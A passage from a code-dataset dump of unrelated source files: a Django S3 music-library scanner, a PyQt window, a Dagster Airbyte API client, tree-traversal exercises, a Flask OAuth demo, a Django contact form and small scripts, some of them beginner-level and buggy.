BaseCommand\n\nfrom nickelodeon.models import MP3Song, UserSettings\nfrom nickelodeon.utils import get_s3_client\n\nMP3_FILE_EXT_RE = re.compile(r\"(.+)\\.mp3$\", re.IGNORECASE)\n\n\nclass Command(BaseCommand):\n args = \"[folders]\"\n help = \"Scan the media folder and update the database of music files\"\n\n songs_to_find = set()\n songs_to_remove = set()\n songs_to_add = set()\n aac_set = set()\n aac_list = []\n t0 = t1 = last_flush = songs_count = 0\n encoding = \"UTF-8\"\n root = None\n owner = None\n\n def add_arguments(self, parser):\n parser.add_argument(\"folders\", nargs=\"*\", type=str)\n\n def handle_folder(self, root):\n self.root = root + \"/\"\n self.t0 = self.last_flush = time.time()\n self.songs_count = 0\n self.songs_to_add = []\n self.stdout.write(\"Scanning directory {} for music\".format(self.root))\n self.t1 = self.last_flush = time.time()\n for filename in self.scan_directory():\n self.process_music_file(filename)\n self.t1 = self.last_flush = time.time()\n self.print_scan_status(True)\n current_song_qs = MP3Song.objects.all()\n prefix = self.root\n root_folder = self.root[: self.root.find(\"/\")]\n try:\n self.owner = UserSettings.objects.get_or_create(\n storage_prefix=root_folder\n ).user\n except UserSettings.DoesNotExist:\n self.owner = User.objects.get(username=root_folder)\n current_song_qs = current_song_qs.filter(owner=self.owner)\n prefix = prefix[len(root_folder) + 1 :]\n if prefix:\n current_song_qs = current_song_qs.filter(filename__startswith=prefix)\n current_songs = set(current_song_qs.values_list(\"filename\", \"owner__username\"))\n current_songs = set([s[1] + \"/\" + s[0] for s in current_songs])\n self.songs_to_add = set(self.songs_to_add)\n self.songs_to_remove = [\n song for song in current_songs if song not in self.songs_to_add\n ]\n self.songs_to_add = [\n song for song in self.songs_to_add if song not in current_songs\n ]\n self.finalize()\n\n def handle(self, *args, **options):\n folders = options[\"folders\"]\n if not folders:\n folders = [u.settings.storage_prefix for u in User.objects.all()]\n for folder in folders:\n self.handle_folder(folder)\n\n def finalize(self):\n nb_songs_to_add = len(self.songs_to_add)\n nb_songs_to_remove = len(self.songs_to_remove)\n self.stdout.write(\"\\nDiscovered {} new file(s)\".format(nb_songs_to_add))\n self.stdout.write(\"Removing {} file(s)\".format(nb_songs_to_remove))\n if nb_songs_to_add > 0:\n self.bulk_create()\n if nb_songs_to_remove > 0:\n self.bulk_remove()\n self.stdout.write(\n \"Task completed in {} seconds\".format(round(time.time() - self.t0, 1))\n )\n\n def scan_directory(self):\n s3 = get_s3_client()\n # Should use v2 but wasabi fails to list all files with it\n # paginator = s3.get_paginator('list_objects_v2')\n paginator = s3.get_paginator(\"list_objects\")\n kwargs = {\n \"Bucket\": settings.S3_BUCKET,\n \"Prefix\": self.root,\n }\n for page in paginator.paginate(**kwargs):\n try:\n contents = page[\"Contents\"]\n except KeyError:\n break\n\n for obj in contents:\n key = obj[\"Key\"]\n if key.endswith(\".mp3\"):\n yield key\n if key.endswith(\".aac\"):\n self.aac_list.append(key[:-4])\n\n def process_music_file(self, media_path):\n if not MP3_FILE_EXT_RE.search(media_path):\n return\n if len(media_path) > 255:\n self.stderr.write(\n \"Media path too long, \" \"255 characters maximum. %s\" % media_path\n )\n return\n new_song = media_path[:-4]\n self.songs_to_add.append(new_song)\n self.songs_count += 1\n self.print_scan_status()\n\n def print_scan_status(self, force=False):\n if time.time() - self.last_flush > 1 or force:\n self.last_flush = time.time()\n self.stdout.write(\n \"\\rScanned {} music file(s) in {} seconds\".format(\n self.songs_count, round(time.time() - self.t1, 1)\n ),\n ending=\"\",\n )\n self.stdout.flush()\n\n def has_aac(self, filename):\n return filename in self.aac_set\n\n def bulk_create(self):\n bulk = []\n self.aac_set = set(self.aac_list)\n for song_file in self.songs_to_add:\n bulk.append(\n MP3Song(\n filename=song_file[len(self.owner.settings.storage_prefix) + 1 :],\n aac=self.has_aac(song_file),\n owner=self.owner,\n )\n )\n MP3Song.objects.bulk_create(bulk)\n\n def bulk_remove(self):\n files = []\n root_folder_len = len(self.owner.settings.storage_prefix) + 1\n for song_file in self.songs_to_remove:\n files.append(song_file[root_folder_len:])\n MP3Song.objects.filter(owner_id=self.owner.id, filename__in=set(files)).delete()\n","sub_path":"nickelodeon/management/commands/refresh_song_db.py","file_name":"refresh_song_db.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"535619381","text":"# -*- coding: gb2312 -*-\nfrom PyQt4 import QtGui, Qt\n\nimage=QtGui.QImage()\nbgImage=image.load(\"../pics/help/help.png\")\n\nclass helpWindow(QtGui.QMainWindow):\n def __init__(self,parent=None):\n super(helpWindow, self).__init__(parent)\n self.setWindowTitle(u\"xiaoyPhoto 帮助\")\n self.setFixedSize(609, 666)\n self.setWindowIcon(QtGui.QIcon(\"../pics/icon/icon.png\"))\n desktop =QtGui.QApplication.desktop()\n width = desktop.width()\n height = desktop.height()\n self.move((width - self.width())/2, (height - self.height())/2-20)\n \n def resizeEvent(self,event):\n pal=QtGui.QPalette()\n pal.setBrush(QtGui.QPalette.Window, QtGui.QBrush(image.scaled(event.size(),\n Qt.Qt.KeepAspectRatioByExpanding,Qt.Qt.SmoothTransformation)))\n self.setPalette(pal)\n \n def mouseDoubleClickEvent(self, event):\n self.close()\n","sub_path":"xiaoyPhoto/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"464086589","text":"from mbnf_scanner import MbnfScanner\nfrom mbnf_parser import MbnfParser\nfrom parser_generator import ParserGenerator\n\n\ns = MbnfScanner()\ntokens = s.scan('grammars/CEG-RR')\nprint(tokens)\np = MbnfParser(tokens)\np.parse()\npg = ParserGenerator(p)\npg.print_ll1_sets()\npg.print_yaml_ll1_table()\n\n","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"410784033","text":"from django import forms\nimport mistune\n\nclass ContactForm(forms.Form):\n email_address = forms.EmailField(widget=forms.EmailInput(attrs={\n 'class': 'form-control',\n 'placeholder': 'for me to reply to'\n }))\n name = forms.CharField(widget=forms.TextInput(attrs={\n 'class': 'form-control',\n 'placeholder': 'so I know who you are'\n }))\n message = forms.CharField(widget=forms.Textarea(attrs={\n 'class': 'form-control',\n 'placeholder': 'what do you want to say',\n }))\n\n def markdown(self, value):\n markdown = mistune.Markdown()\n return markdown(value)\n\n def send_email(self, fields):\n from django.core.mail import EmailMultiAlternatives\n from django.utils.html import strip_tags\n\n subject, from_email, to = \"contact | %s\" % fields[\"name\"], 'contact_me@lukespademan.com', 'info@lukespademan.com'\n\n html_content = self.markdown(fields[\"message\"])\n text_content = strip_tags(html_content)\n\n msg = EmailMultiAlternatives(subject, text_content, from_email, [to])\n msg.attach_alternative(html_content, \"text/html\")\n msg.send()\n\n","sub_path":"contact/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"277580570","text":"import logging\nimport sys\nimport time\nfrom typing import Dict, List, Optional, cast\n\nimport requests\nfrom dagster_airbyte.types import AirbyteOutput\nfrom requests.exceptions import RequestException\n\nfrom dagster import Failure, Field, StringSource, __version__\nfrom dagster import _check as check\nfrom dagster import get_dagster_logger, resource\n\nDEFAULT_POLL_INTERVAL_SECONDS = 10\n\n\nclass AirbyteState:\n RUNNING = \"running\"\n SUCCEEDED = \"succeeded\"\n CANCELLED = \"cancelled\"\n PENDING = \"pending\"\n FAILED = \"failed\"\n ERROR = \"error\"\n INCOMPLETE = \"incomplete\"\n\n\nclass AirbyteResource:\n \"\"\"\n This class exposes methods on top of the Airbyte REST API.\n \"\"\"\n\n def __init__(\n self,\n host: str,\n port: str,\n use_https: bool,\n request_max_retries: int = 3,\n request_retry_delay: float = 0.25,\n log: logging.Logger = get_dagster_logger(),\n forward_logs: bool = True,\n ):\n self._host = host\n self._port = port\n self._use_https = use_https\n self._request_max_retries = request_max_retries\n self._request_retry_delay = request_retry_delay\n\n self._log = log\n\n self._forward_logs = forward_logs\n\n @property\n def api_base_url(self) -> str:\n return (\n (\"https://\" if self._use_https else \"http://\")\n + (f\"{self._host}:{self._port}\" if self._port else self._host)\n + \"/api/v1\"\n )\n\n def make_request(\n self, endpoint: str, data: Optional[Dict[str, object]]\n ) -> Optional[Dict[str, object]]:\n \"\"\"\n Creates and sends a request to the desired Airbyte REST API endpoint.\n\n Args:\n endpoint (str): The Airbyte API endpoint to send this request to.\n data (Optional[str]): JSON-formatted data string to be included in the request.\n\n Returns:\n Optional[Dict[str, Any]]: Parsed json data from the response to this request\n \"\"\"\n\n headers = {\"accept\": \"application/json\"}\n\n num_retries = 0\n while True:\n try:\n response = requests.request(\n method=\"POST\",\n url=self.api_base_url + endpoint,\n headers=headers,\n json=data,\n timeout=15,\n )\n response.raise_for_status()\n if response.status_code == 204:\n return None\n return response.json()\n except RequestException as e:\n self._log.error(\"Request to Airbyte API failed: %s\", e)\n if num_retries == self._request_max_retries:\n break\n num_retries += 1\n time.sleep(self._request_retry_delay)\n\n raise Failure(\"Exceeded max number of retries.\")\n\n def cancel_job(self, job_id: int):\n self.make_request(endpoint=\"/jobs/cancel\", data={\"id\": job_id})\n\n def get_job_status(self, connection_id: str, job_id: int) -> dict:\n if self._forward_logs:\n return check.not_none(self.make_request(endpoint=\"/jobs/get\", data={\"id\": job_id}))\n else:\n # the \"list all jobs\" endpoint doesn't return logs, which actually makes it much more\n # lightweight for long-running syncs with many logs\n out = check.not_none(\n self.make_request(\n endpoint=\"/jobs/list\",\n data={\n \"configTypes\": [\"sync\"],\n \"configId\": connection_id,\n # sync should be the most recent, so pageSize 5 is sufficient\n \"pagination\": {\"pageSize\": 5},\n },\n )\n )\n job = next((job for job in cast(List, out[\"jobs\"]) if job[\"job\"][\"id\"] == job_id), None)\n\n return check.not_none(job)\n\n def start_sync(self, connection_id: str) -> Dict[str, object]:\n return check.not_none(\n self.make_request(endpoint=\"/connections/sync\", data={\"connectionId\": connection_id})\n )\n\n def get_connection_details(self, connection_id: str) -> Dict[str, object]:\n return check.not_none(\n self.make_request(endpoint=\"/connections/get\", data={\"connectionId\": connection_id})\n )\n\n def sync_and_poll(\n self,\n connection_id: str,\n poll_interval: float = DEFAULT_POLL_INTERVAL_SECONDS,\n poll_timeout: Optional[float] = None,\n ) -> AirbyteOutput:\n \"\"\"\n Initializes a sync operation for the given connector, and polls until it completes.\n\n Args:\n connection_id (str): The Airbyte Connector ID. You can retrieve this value from the\n \"Connection\" tab of a given connection in the Arbyte UI.\n poll_interval (float): The time (in seconds) that will be waited between successive polls.\n poll_timeout (float): The maximum time that will waited before this operation is timed\n out. By default, this will never time out.\n\n Returns:\n :py:class:`~AirbyteOutput`:\n Details of the sync job.\n \"\"\"\n connection_details = self.get_connection_details(connection_id)\n job_details = self.start_sync(connection_id)\n job_info = cast(Dict[str, object], job_details.get(\"job\", {}))\n job_id = cast(int, job_info.get(\"id\"))\n\n self._log.info(f\"Job {job_id} initialized for connection_id={connection_id}.\")\n start = time.monotonic()\n logged_attempts = 0\n logged_lines = 0\n state = None\n\n try:\n while True:\n if poll_timeout and start + poll_timeout < time.monotonic():\n raise Failure(\n f\"Timeout: Airbyte job {job_id} is not ready after the timeout {poll_timeout} seconds\"\n )\n time.sleep(poll_interval)\n job_details = self.get_job_status(connection_id, job_id)\n attempts = cast(List, job_details.get(\"attempts\", []))\n cur_attempt = len(attempts)\n # spit out the available Airbyte log info\n if cur_attempt:\n if self._forward_logs:\n log_lines = attempts[logged_attempts].get(\"logs\", {}).get(\"logLines\", [])\n\n for line in log_lines[logged_lines:]:\n sys.stdout.write(line + \"\\n\")\n sys.stdout.flush()\n logged_lines = len(log_lines)\n\n # if there's a next attempt, this one will have no more log messages\n if logged_attempts < cur_attempt - 1:\n logged_lines = 0\n logged_attempts += 1\n\n job_info = cast(Dict[str, object], job_details.get(\"job\", {}))\n state = job_info.get(\"status\")\n\n if state in (AirbyteState.RUNNING, AirbyteState.PENDING, AirbyteState.INCOMPLETE):\n continue\n elif state == AirbyteState.SUCCEEDED:\n break\n elif state == AirbyteState.ERROR:\n raise Failure(f\"Job failed: {job_id}\")\n elif state == AirbyteState.CANCELLED:\n raise Failure(f\"Job was cancelled: {job_id}\")\n else:\n raise Failure(f\"Encountered unexpected state `{state}` for job_id {job_id}\")\n finally:\n # if Airbyte sync has not completed, make sure to cancel it so that it doesn't outlive\n # the python process\n if state not in (AirbyteState.SUCCEEDED, AirbyteState.ERROR, AirbyteState.CANCELLED):\n self.cancel_job(job_id)\n\n return AirbyteOutput(job_details=job_details, connection_details=connection_details)\n\n\n@resource(\n config_schema={\n \"host\": Field(\n StringSource,\n is_required=True,\n description=\"The Airbyte Server Address.\",\n ),\n \"port\": Field(\n StringSource,\n is_required=False,\n description=\"Port for the Airbyte Server.\",\n ),\n \"use_https\": Field(\n bool,\n default_value=False,\n description=\"Use https to connect in Airbyte Server.\",\n ),\n \"request_max_retries\": Field(\n int,\n default_value=3,\n description=\"The maximum number of times requests to the Airbyte API should be retried \"\n \"before failing.\",\n ),\n \"request_retry_delay\": Field(\n float,\n default_value=0.25,\n description=\"Time (in seconds) to wait between each request retry.\",\n ),\n \"forward_logs\": Field(\n bool,\n default_value=True,\n description=\"Whether to forward Airbyte logs to the compute log, can be expensive for long-running syncs.\",\n ),\n },\n description=\"This resource helps manage Airbyte connectors\",\n)\ndef airbyte_resource(context) -> AirbyteResource:\n \"\"\"\n This resource allows users to programatically interface with the Airbyte REST API to launch\n syncs and monitor their progress. This currently implements only a subset of the functionality\n exposed by the API.\n\n For a complete set of documentation on the Airbyte REST API, including expected response JSON\n schema, see the `Airbyte API Docs `_.\n\n To configure this resource, we recommend using the `configured\n `_ method.\n\n **Examples:**\n\n .. code-block:: python\n\n from dagster import job\n from dagster_airbyte import airbyte_resource\n\n my_airbyte_resource = airbyte_resource.configured(\n {\n \"host\": {\"env\": \"AIRBYTE_HOST\"},\n \"port\": {\"env\": \"AIRBYTE_PORT\"},\n }\n )\n\n @job(resource_defs={\"airbyte\":my_airbyte_resource})\n def my_airbyte_job():\n ...\n\n \"\"\"\n return AirbyteResource(\n host=context.resource_config[\"host\"],\n port=context.resource_config[\"port\"],\n use_https=context.resource_config[\"use_https\"],\n request_max_retries=context.resource_config[\"request_max_retries\"],\n request_retry_delay=context.resource_config[\"request_retry_delay\"],\n log=context.log,\n forward_logs=context.resource_config[\"forward_logs\"],\n )\n","sub_path":"python_modules/libraries/dagster-airbyte/dagster_airbyte/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":10591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"188361565","text":"#\n# @lc app=leetcode id=94 lang=python3\n#\n# [94] Binary Tree Inorder Traversal\n#\n# https://leetcode.com/problems/binary-tree-inorder-traversal/description/\n#\n# algorithms\n# Medium (60.47%)\n# Likes: 2433\n# Dislikes: 100\n# Total Accepted: 618.2K\n# Total Submissions: 1M\n# Testcase Example: '[1,null,2,3]'\n#\n# Given a binary tree, return the inorder traversal of its nodes' values.\n#\n# Example:\n#\n#\n# Input: [1,null,2,3]\n# ⁠ 1\n# ⁠ \\\n# ⁠ 2\n# ⁠ /\n# ⁠ 3\n#\n# Output: [1,3,2]\n#\n# Follow up: Recursive solution is trivial, could you do it iteratively?\n#\n#\n\n# @lc code=start\n# Definition for a binary tree node.\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Recursive:\n # Recursive\n def in_order(self, root):\n result = []\n if root:\n self.in_order_traverse(root, result)\n return result\n\n def in_order_traverse(self, root, result):\n if root:\n if root.left:\n self.in_order_traverse(root.left, result)\n result.append(root.vaule)\n if root.right:\n self.in_order_traverse(root.right, result)\n\n# This approach is smart but not sure the space usage is the same as the regular iterative approach\n# TODO check the space usage of this approach\nclass Iterative:\n # Time complexity: O(n)\n # Space Complexity: O(n)\n def in_order(self, root):\n result, stack = [], [root]\n while stack:\n current_ele = stack.pop()\n if current_ele:\n if isinstance(current_ele, TreeNode):\n stack.append(current_ele.right)\n stack.append(current_ele.val)\n stack.append(current_ele.left)\n else:\n result.append(current_ele)\n return result\n\n def pre_order(self, root):\n result, stack = [], [root]\n while stack:\n current_ele = stack.pop()\n if current_ele:\n if isinstance(current_ele, TreeNode):\n stack.append(current_ele.right)\n stack.append(current_ele.left)\n stack.append(current_ele.val)\n else:\n result.append(current_ele)\n return result\n\n\n def post_order(self, root):\n result, stack = [], [root]\n while stack:\n current_ele = stack.pop()\n if current_ele:\n if isinstance(current_ele, TreeNode):\n stack.append(current_ele.val)\n stack.append(current_ele.right)\n stack.append(current_ele.left)\n else:\n result.append(current_ele)\n return result\n\n\nclass DQ:\n def post_order(self, root):\n result = []\n if not root:\n return result\n\n left = self.post_order(root.left)\n right = self.post_order(root.right)\n\n result.extend(left)\n result.extend(right)\n result.append(root.val)\n\n return result\n\n\nnode1 = TreeNode(1)\nnode2 = TreeNode(2)\nnode3 = TreeNode(3)\nnode4 = TreeNode(4)\nnode5 = TreeNode(5)\nnode6 = TreeNode(6)\nnode7 = TreeNode(7)\nnode1.left = node2\nnode1.right = node3\nnode2.left = node4\nnode2.right = node5\nnode3.left = node6\nnode3.right = node7\n# 1\n# 2 3\n# 4 5 6 7\n\n# 4 5 2 6 7 3 1\nexa = Iterative()\nprint(exa.post_order(node1))\nprint(exa.in_order(node1))\nprint(exa.pre_order(node1))\n\n# test = DQ()\n# print(test.post_order(node1))","sub_path":"leetcode/Binary Tree/94. 144. 145. Preorder Inorder Postorder Binary Tree.py","file_name":"94. 144. 145. Preorder Inorder Postorder Binary Tree.py","file_ext":"py","file_size_in_byte":3528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"537245732","text":"import requests\nimport base64\n\nimport tkinter as tk\n\ndef get_html_data(url):\n data= requests.get(url)\n return data\n\ndef get_covid_data():\n url(\"https://www.worldometers.info/coronavirus/\")\n html_data = get_html_data(url)\n bs=base64(html_data.text,\"html.parser\")\n print(bs)\n\n\n\nget_covid_data()\n\n ","sub_path":"Python.py/Covid.py","file_name":"Covid.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"425391974","text":"# Copyright 2016, Google, Inc.\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Demonstrates how to make a simple call to the Natural Language API.\"\"\"\n\nimport argparse\n\nfrom googleapiclient import discovery\nfrom oauth2client.client import GoogleCredentials\n\n\ndef main(movie_review_filename):\n \"\"\"Run a sentiment analysis request on text within a passed filename.\"\"\"\n\n credentials = GoogleCredentials.get_application_default()\n service = discovery.build('language', 'v1', credentials=credentials)\n\n with open(movie_review_filename, 'r') as review_file:\n service_request = service.documents().analyzeSentiment(\n body={\n 'document': {\n 'type': 'PLAIN_TEXT',\n 'content': review_file.read(),\n }\n }\n )\n response = service_request.execute()\n\n score = response['documentSentiment']['score']\n magnitude = response['documentSentiment']['magnitude']\n\n for i, sentence in enumerate(response['sentences']):\n sentence_sentiment = sentence['sentiment']['score']\n print('Sentence {} has a sentiment score of {}'.format(\n i, sentence_sentiment))\n\n print('Overall Sentiment: score of {} with magnitude of {}'.format(\n score, magnitude))\n return 0\n\n print('Sentiment: score of {} with magnitude of {}'.format(\n score, magnitude))\n return 0\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument(\n 'movie_review_filename',\n help='The filename of the movie review you\\'d like to analyze.')\n args = parser.parse_args()\n main(args.movie_review_filename)\n","sub_path":"language/sentiment/sentiment_analysis.py","file_name":"sentiment_analysis.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"98194809","text":"from typing import List\nimport datetime\n\nimport common.Database.private_message as Database\nfrom common.connection_pool import get_connection\nfrom models.user import User\n\n\n# Try to add the boolean is_new property later, but don't waste your time on it since Python wants to act retarded and punish me for adding it\n\nclass Private_Message:\n def __init__(self, SUBJECT: str, CONTENT: str, USER_FROM: int, USER_TO: int,\n _ID: int = None, _ORIGIN: datetime = None, IS_NEW: bool = True):\n\n self.id = _ID\n self.origin = datetime.datetime.now() if _ORIGIN is None else _ORIGIN\n self.is_new = IS_NEW\n self.subject = SUBJECT\n self.content = CONTENT\n self.user_from = USER_FROM\n self.user_to = USER_TO\n\n\n # int, datetime, str, str, bool, int, int\n def __repr__(self) -> str:\n return f\"Private_Message({self.id!r}, {self.origin!r}, {self.is_new!r},\" \\\n f\" {self.subject!r}, {self.content!r}, {self.user_from!r}, {self.user_to!r})\"\n\n def save(self):\n with get_connection() as connection:\n new_private_message_id = Database.create_private_message(connection, self.origin, self.is_new,\n self.subject, self.content, self.user_from, self.user_to)\n self.id = new_private_message_id\n\n # Database tuple --- int, datetime, str, str, bool, int, int\n # Classmethod tuple --- str, str, int, int, int, datetime\n @classmethod\n def all_my_messages(cls, user_id) -> List[\"Private_Message\"]:\n with get_connection() as connection:\n messages = Database.get_my_mail(connection, user_id)\n return [cls(message[3], message[4], message[5], message[6], message[0], message[1], message[2])\n for message in messages]\n\n @classmethod\n def all_my_senders(cls, user_id) -> List[\"User\"]:\n messages = Private_Message.all_my_messages(user_id)\n users_from = []\n for message in messages:\n user_from_id = message.user_from\n user_from = User.get_by_id(user_from_id)\n users_from.append(user_from)\n return users_from\n\n @classmethod\n def get_message_by_id(cls, message_id) -> \"Private_Message\":\n with get_connection() as connection:\n message = Database.get_message_by_id(connection, message_id)\n return cls(message[3], message[4], message[5], message[6], message[0], message[1], message[2])\n\n @classmethod\n def set_as_saved(cls, message_id):\n with get_connection() as connection:\n Database.set_as_saved(connection, message_id)\n\n @classmethod\n def who_its_to(cls, message_id) -> \"User\":\n the_message = Private_Message.get_message_by_id(message_id)\n users_id = the_message.user_to\n user = User.get_by_id(users_id)\n return user\n\n @classmethod\n def who_its_from(cls, message_id) -> \"User\":\n the_message = Private_Message.get_message_by_id(message_id)\n users_id = the_message.user_from\n user = User.get_by_id(users_id)\n return user\n\n @classmethod\n def all_new_messages(cls, user_id) -> List[\"Private_Message\"]:\n with get_connection() as connection:\n messages = Database.get_my_new_mail(connection, user_id)\n return [cls(message[3], message[4], message[5], message[6], message[0], message[1], message[2]) for message in messages]\n\n @classmethod\n def all_saved_messages(cls, user_id) -> List[\"Private_Message\"]:\n with get_connection() as connection:\n messages = Database.get_my_saved_mail(connection, user_id)\n return [cls(message[3], message[4], message[5], message[6], message[0], message[1], message[2]) for message in messages]\n\n\n @classmethod\n def delete_message(cls, message_id):\n with get_connection() as connection:\n message = Private_Message.get_message_by_id(message_id)\n Database.delete_private_message(connection, message_id)","sub_path":"V9/models/private_message.py","file_name":"private_message.py","file_ext":"py","file_size_in_byte":3985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"563653718","text":"\"\"\"\nFlask application. Modeled in part on https://requests-oauthlib.readthedocs.org/en/latest/#overview\n\nThis is a demonstration application, only. This is not the recommended way to handle secret info in production,\n and contains minimal error handling at best.\n\"\"\"\n__author__ = 'andyboughton'\n\nimport os\n\nfrom flask import Flask, abort, redirect, request, session, url_for\nimport furl\nimport requests\nfrom requests_oauthlib import OAuth2Session\n\nimport settings\n\n\napp = Flask(__name__, static_folder='bower_components')\n\n\n#### Utility functions\ndef token_updater(token):\n \"\"\"Store the newest version of the token\"\"\"\n session['oauth_token'] = token\n\n\ndef get_request_client(token_dict):\n \"\"\"\n DRY request client\n :param token_dict: Token data returned from OAuth server (including access and refresh tokens)\n :return: Preconfigured oauth2 client\n \"\"\"\n refresh_kwargs = {'client_id': settings.CLIENT_ID,\n 'client_secret': settings.CLIENT_SECRET,\n 'redirect_uri': settings.CALLBACK_URL}\n\n client = OAuth2Session(settings.CLIENT_ID,\n redirect_uri=settings.CALLBACK_URL,\n token=token_dict,\n auto_refresh_url=settings.TOKEN_REFRESH_URL,\n auto_refresh_kwargs=refresh_kwargs,\n token_updater=token_updater)\n return client\n\n\n#### API Handlers\ndef api_v2_url(path_str,\n params=None,\n base_route=settings.API_BASE_URL,\n **kwargs):\n \"\"\"\n Convenience function for APIv2 usage: Concatenates parts of the absolute API url based on arguments provided\n\n For example: given path_str = '/nodes/abcd3/contributors/' and params {'filter[fullname]': 'bob'},\n this function would return the following on the local staging environment:\n 'http://localhost:8000/nodes/abcd3/contributors/?filter%5Bfullname%5D=bob'\n\n This is NOT a full lookup function. It does not verify that a route actually exists to match the path_str given.\n \"\"\"\n params = params or {} # Optional params dict for special-character param names, eg filter[fullname]\n\n base_url = furl.furl(base_route)\n sub_url = furl.furl(path_str)\n\n base_url.path.add(sub_url.path.segments)\n\n base_url.args.update(params)\n base_url.args.update(kwargs)\n return str(base_url)\n\n\nclass ApiV2(object):\n \"\"\"\n Mock class for OSF APIv2 calls. Can pass in a preconfigured client for OAuth usage.\n\n :param client: A `requests`-like object for making API calls.\n \"\"\"\n def __init__(self, client=None):\n self.client = client or requests\n\n def get_user_id(self):\n url = api_v2_url(\"/users/me\")\n res = self.client.get(url)\n data = res.json()['data']\n\n return data['id']\n\n def get_projects_count(self, filters=None):\n url = api_v2_url('/users/me/nodes', params=filters)\n res = self.client.get(url)\n return res.json()['links']['meta']['total']\n\n\n#### Routes\n@app.route('/', methods=['GET'])\ndef home():\n \"\"\"Display auth screen, or redirect to the action, as appropriate\"\"\"\n token = session.get('oauth_token')\n if token is None:\n return redirect(url_for('login'))\n return redirect(url_for('graph_projects'))\n\n\n@app.route('/login/', methods=['GET'])\ndef login():\n osf = OAuth2Session(client_id=settings.CLIENT_ID, redirect_uri=settings.CALLBACK_URL)\n authorization_url, state = osf.authorization_url(settings.AUTH_BASE_URL, approval_prompt='force')\n session['oauth_state'] = state\n return redirect(authorization_url)\n\n\n@app.route('/callback/', methods=['GET'])\ndef callback():\n \"\"\"The oauth app redirects the user here; perform logic to fetch access token and redirect to a target url\"\"\"\n osf = OAuth2Session(settings.CLIENT_ID, redirect_uri=settings.CALLBACK_URL, state=session['oauth_state'])\n auth_response = request.url\n\n # TODO: The token request fails (with CAS errors) when redirect_uri is not specified; is this a CAS bug?\n token = osf.fetch_token(settings.TOKEN_REQUEST_URL,\n client_secret=settings.CLIENT_SECRET,\n authorization_response=auth_response,\n verify=settings.REQUIRE_HTTPS)\n\n token_updater(token)\n return redirect(url_for(\"graph_projects\"))\n\n\n@app.route('/graph/', methods=['GET'])\ndef graph_projects():\n \"\"\"If the user is logged in and has registered an access token, perform queries\"\"\"\n token = session.get('oauth_token')\n if token is None:\n # Login page indirectly redirects here; don't create a circular redirect.\n abort(403)\n\n client = get_request_client(token)\n api = ApiV2(client=client)\n\n public_count = api.get_projects_count(filters={'filter[public]': 'true'})\n private_count = api.get_projects_count(filters={'filter[public]': 'false'})\n\n # TODO: Make this a graph\n return \"You're logged in! You have {} public and {} private projects\".format(public_count, private_count)\n\n\nif __name__ == '__main__':\n # For local development *only*: disable the HTTPS requirement. Don't do this in production. Really.\n app.config.from_pyfile('settings.py')\n if settings.REQUIRE_HTTPS is False:\n os.environ['DEBUG'] = '1'\n os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'\n\n app.run(port=5001)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"47711194","text":"'''\nCreated on Jan 17, 2016\n\n@author: peter\n'''\ndef factor(number):\n factorNumber = number//2\n while factorNumber >2:\n if number % factorNumber == 0:\n if isPrime(factorNumber):\n return factorNumber\n factorNumber = factorNumber - 1\ndef isPrime(n):\n checkNumber = n//2\n while checkNumber > 1:\n if n % checkNumber == 0:\n return False\n checkNumber = checkNumber -1\n return True\nprint (factor(600851475143))","sub_path":"EulerProj/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"30888054","text":"# -*- coding: utf-8 -*-\n\nimport telegram\nimport gettext\nimport logging\n\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup\nfrom telegram.ext import CommandHandler, CallbackQueryHandler\n\nen = gettext.translation('en', localedir='locale', languages=['en'])\nde = gettext.translation('de', localedir='locale', languages=['de'])\nLANGUAGES=( 'de' , 'en' )\n\nlogger = logging.getLogger(__name__)\n\nen.install()\nbuttons = {}\nbuttons[\"test\"] = InlineKeyboardButton(_(\"MENU:TEST\"), callback_data='menu_test') \nbuttons[\"de\"] = InlineKeyboardButton(_(\"MENU:CONF:language:de\"), callback_data='language_de')\nbuttons[\"en\"] = InlineKeyboardButton(_(\"MENU:CONF:language:en\"), callback_data='language_en')\n\nkeyboard = {}\nkeyboard[\"en_start\"] = InlineKeyboardMarkup(\n [\n [ buttons[\"de\"] , buttons[\"en\"]],\n [ buttons[\"test\"] ],\n ]\n )\nde.install()\nbuttons = {}\nbuttons[\"test\"] = 